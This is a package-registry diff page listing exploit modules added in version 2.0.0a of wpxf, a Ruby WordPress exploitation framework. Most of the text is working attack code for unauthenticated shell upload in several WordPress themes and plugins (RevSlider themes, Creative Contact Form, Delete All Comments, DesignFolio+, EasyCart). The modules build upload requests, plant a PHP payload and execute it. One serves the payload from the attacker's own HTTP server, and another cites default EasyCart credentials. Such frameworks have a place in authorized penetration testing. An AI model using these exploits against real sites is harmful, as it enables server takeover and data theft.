RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (455) hide show

data/lib/wpxf/modules/exploit/shell/bretheon_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::BretheonRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Bretheon Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Bretheon theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/centum_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::CentumRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Centum Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Centum theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/charity_theme_shell_upload.rb ADDED

@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+require 'socket'
+require_rel './simplecart_shell_upload'
+class Wpxf::Exploit::CharityThemeShellUpload < Wpxf::Exploit::SimplecartShellUpload
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Charity Theme Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in all versions '\
+            'of the Charity theme found in the upload_file.php script '\
+            'which contains no session or file validation. It allows '\
+            'unauthenticated users to upload files of any type and '\
+            'subsequently execute PHP scripts in the context of the '\
+            'web server.',
+      author: [
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['EDB', '36611']
+      ],
+      date: 'April 02 2015'
+    )
+  end
+  def check
+    check_theme_version_from_readme('charity')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_themes, 'charity')
+  end
+end

data/lib/wpxf/modules/exploit/shell/construct_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::ConstructRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Construct Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Construct theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb ADDED

@@ -0,0 +1,82 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::CreativeContactFormShellUpload < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Creative Contact Form Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in all versions '\
+            'of the Creative Contact Form plugin prior to version 0.9.8 which '\
+            'allows unauthenticated users to upload and execute PHP scripts '\
+            'in the context of the web server.',
+      author: [
+        'Gianni Angelozzi', # Vulnerability discovery
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['EDB', '35057'],
+        ['WPVDB', '7652']
+      ],
+      date: 'Oct 22 2014'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('sexy-contact-form', '0.9.8')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'sexy-contact-form')
+  end
+  def uploader_url
+    normalize_uri(plugin_url, 'includes', 'fileupload', 'index.php')
+  end
+  def payload_body_builder(payload_name)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('files[]', payload.encoded, payload_name)
+    builder
+  end
+  def run
+    return false unless super
+    emit_info 'Preparing payload...'
+    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
+    builder = payload_body_builder(payload_name)
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: uploader_url, body: body)
+    end
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200 || res.body !~ /files|#{Regexp.escape(payload_name)}/
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+    payload_url = normalize_uri(plugin_url, 'includes', 'fileupload', 'files', payload_name)
+    emit_success "Uploaded the payload to #{payload_url}", true
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    return true
+  end
+end

data/lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb ADDED

@@ -0,0 +1,65 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::DeleteAllCommentsShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  include Wpxf::Net::HttpServer
+  def initialize
+    super
+    update_info(
+      name: 'Delete All Comments Unauthenticated Shell Upload',
+      author: [
+        'NinTechNet', # Discovery and disclosure
+        'rastating'   # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8694'],
+        ['URL', 'http://blog.nintechnet.com/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin/']
+      ],
+      date: 'Dec 10 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'http_server_host',
+        desc: 'The external address of the host running this module',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('delete-all-comments')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'delete-all-comments.php')
+  end
+  def download_url
+    "http://#{datastore['http_server_host']}:#{http_server_bind_port}/#{Utility::Text.rand_alpha(8)}/#{payload_name}"
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('restorefromfileURL', download_url)
+    builder.add_field('restorefromfileNAME', payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'backup', payload_name)
+  end
+  def on_http_request(_path, _params, _headers)
+    payload.encoded
+  end
+  def run
+    start_http_server(true)
+    success = super
+    stop_http_server
+    success
+  end
+end

data/lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb ADDED

@@ -0,0 +1,50 @@
+# frozen_string_literal: true
+require 'socket'
+class Wpxf::Exploit::DesignfolioPlusShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'DesignFolio+ Theme Unauthenticated Shell Upload',
+      author: [
+        'CrashBandicot', # Vulnerability disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7880'],
+        ['EDB', '36372']
+      ],
+      date: 'Mar 04 2015'
+    )
+  end
+  def check
+    check_theme_version_from_readme('designfolio-plus')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_themes, 'designfolio-plus', 'admin', 'upload-file.php')
+  end
+  def encoded_relative_path_to_uploads
+    Base64.strict_encode64('../../../uploads')
+  end
+  def payload_body_builder
+    target_ip = IPSocket.getaddress(target_host)
+    field_name = Utility::Text.md5(target_ip)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string(field_name, payload.encoded, payload_name)
+    builder.add_field('upload_path', encoded_relative_path_to_uploads)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, payload_name.downcase)
+  end
+end

data/lib/wpxf/modules/exploit/shell/divi_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::DiviRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Divi Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Divi theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb ADDED

@@ -0,0 +1,174 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::EasyCartShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+  def initialize
+    super
+    update_info(
+      name: 'EasyCart Shell Upload',
+      desc: 'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
+            'contains a flaw that allows a remote attacker to execute '\
+            'arbitrary PHP code. This flaw exists because the '\
+            '/inc/amfphp/administration/banneruploaderscript.php script does '\
+            'not properly verify or sanitize user-uploaded files. By '\
+            'uploading a .php file, the remote system will place the file in '\
+            'a user-accessible path. Making a direct request to the uploaded '\
+            'file will allow the attacker to execute the script with the '\
+            'privileges of the web server.'\
+            "\n"\
+            'In versions <= 3.0.8 authentication can be done by using the '\
+            'WordPress credentials of a user with any role. In later '\
+            'versions, a valid EasyCart admin password will be required that '\
+            'is in use by any admin user. A default installation of EasyCart '\
+            'will setup a user called "demouser" with a preset password '\
+            'of "demouser".',
+      author: [
+        'Kacper Szurek', # Vulnerability disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7745']
+      ],
+      date: 'Jan 08 2015'
+    )
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
+      ),
+      StringOption.new(
+        name: 'ec_password',
+        desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
+      ),
+      BooleanOption.new(
+        name: 'ec_password_is_hash',
+        desc: 'Whether or not ec_password is an MD5 hash',
+        default: false
+      )
+    ])
+  end
+  def username
+    normalized_option_value('username')
+  end
+  def password
+    normalized_option_value('password')
+  end
+  def ec_password
+    normalized_option_value('ec_password')
+  end
+  def ec_password_is_hash
+    normalized_option_value('ec_password_is_hash')
+  end
+  def use_wordpress_authentication
+    username.to_s != '' && password.to_s != ''
+  end
+  def use_ec_authentication
+    ec_password.to_s != ''
+  end
+  def req_id
+    if ec_password_is_hash
+      return ec_password
+    else
+      return Utility::Text.md5(ec_password)
+    end
+  end
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.19')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'wp-easycart')
+  end
+  def uploader_url
+    normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
+  end
+  def payload_body_builder(date_hash, payload_name, include_req_id)
+    builder = Utility::BodyBuilder.new
+    builder.add_field('datemd5', date_hash)
+    builder.add_file_from_string('Filedata', payload.encoded, payload_name)
+    builder.add_field('reqID', req_id) if include_req_id
+    builder
+  end
+  def run
+    return false unless super
+    if !use_wordpress_authentication && !use_ec_authentication
+      emit_error 'You must set either the username and password options or '\
+                 'specify an ec_password value'
+      return false
+    end
+    if use_wordpress_authentication && use_ec_authentication
+      emit_info 'Both EasyCart and WordPress credentials were supplied, '\
+                'attempting WordPress first...'
+    end
+    if use_wordpress_authentication
+      emit_info "Authenticating using #{username}:#{password}..."
+      cookie = wordpress_login(username, password)
+      if !cookie
+        if use_ec_authentication
+          emit_warning 'Failed to authenticate with WordPress, attempting '\
+                       'upload with EC password next...'
+        else
+          emit_error 'Failed to authenticate with WordPress'
+          return false
+        end
+      else
+        emit_success 'Authenticated with WordPress', true
+      end
+    end
+    emit_info 'Preparing payload...'
+    payload_name = Utility::Text.rand_alpha(10)
+    date_hash = Utility::Text.md5(Time.now.to_s)
+    uploaded_filename = "#{payload_name}_#{date_hash}.php"
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
+    builder = payload_body_builder(
+      date_hash,
+      "#{payload_name}.php",
+      use_ec_authentication
+    )
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
+    end
+    if res.nil? || res.code != 200
+      emit_error 'Failed to upload payload'
+      emit_error "Server responded with code #{res.code}", true
+      return false
+    end
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    true
+  end
+end